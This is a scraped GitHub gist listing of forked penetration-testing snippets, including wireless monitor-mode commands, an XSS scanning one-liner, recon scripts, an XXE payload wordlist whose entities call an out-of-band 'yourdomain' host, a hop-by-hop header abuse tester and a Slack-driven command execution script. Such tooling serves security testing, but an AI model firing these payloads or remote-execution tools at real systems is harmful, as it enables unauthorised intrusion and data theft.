#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
- Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
MisterHuntz chanpu9
chanpu9
/ gist:1242ed793700f48e808c2e6531aea196
Created
February 2, 2020 12:13
— forked from jsvazic/gist:8fe9dde369f6396f65a1aa795dd77744
ippsec process monitor script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Loop by line | |
| IFS=$'\n' | |
| old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) | |
| while true; do | |
| new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) | |
| diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] |
chanpu9
/ Wireless Penetration Testing Cheat Sheet.md
Created
April 28, 2020 08:12
— forked from dogrocker/Wireless Penetration Testing Cheat Sheet.md
Wireless Penetration Testing Cheat Sheet
chanpu9
/ xss_one_liner.md
Created
May 10, 2020 12:34
— forked from cihanmehmet/xss_one_liner.md
xss_one_liner.md
#cat targets_urls.txt
http://public-firing-range.appspot.comgospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
chanpu9
/ converter.sh
Created
June 10, 2020 03:59
— forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Converter.sh by @xdavidhu | |
| # This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix | |
| # With this script, you can convert domain lists to resolved IP lists without duplicates. | |
| # Usage: ./converter.sh [domain-list-file] [output-file] | |
| echo -e "[+] Converter.sh by @xdavidhu\n" | |
| if [ -z "$1" ] || [ -z "$2" ]; then | |
| echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]" | |
| exit 1 |
chanpu9
/ converter.sh
Created
June 10, 2020 03:59
— forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Converter.sh by @xdavidhu | |
| # This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix | |
| # With this script, you can convert domain lists to resolved IP lists without duplicates. | |
| # Usage: ./converter.sh [domain-list-file] [output-file] | |
| echo -e "[+] Converter.sh by @xdavidhu\n" | |
| if [ -z "$1" ] || [ -z "$2" ]; then | |
| echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]" | |
| exit 1 |
chanpu9
/ st8out.sh
Created
June 10, 2020 04:24
— forked from dwisiswant0/st8out.sh
St8out - Extra one-liner for reconnaissance
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##### | |
| # | |
| # St8out - Extra one-liner for reconnaissance | |
| # | |
| # Usage: ./st8out.sh target.com | |
| # | |
| # Resources: | |
| # - https://github.com/j3ssie/metabigor |
chanpu9
/ send_urls_to_burp
Created
July 11, 2020 13:08
— forked from arbazkiraak/send_urls_to_burp
Send Urls to Burp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import requests,sys | |
| import urllib3,queue,threading | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'} | |
| proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} | |
| urls_inp = sys.argv[1] |
chanpu9
/ xxe-payloads.txt
Created
September 15, 2020 12:45
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
chanpu9
/ hbh-header-abuse-test.py
Created
January 11, 2021 14:33
— forked from ndavison/hbh-header-abuse-test.py
Attempts to find hop-by-hop header abuse potential against the provided URL.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # github.com/ndavison | |
| import requests | |
| import random | |
| import string | |
| from argparse import ArgumentParser | |
| parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.") | |
| parser.add_argument("-u", "--url", help="URL to target (without query string)") |
chanpu9
/ slackexec.py
Created
February 26, 2021 10:31
— forked from m8sec/slackexec.py
Python script to monitor a Slack channel and automate task execution.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Author: m8r0wn | |
| import os | |
| import threading | |
| from sys import exit | |
| from time import sleep | |
| from datetime import datetime | |
| from subprocess import getoutput | |
| from taser.proto.http import web_request |
OlderNewer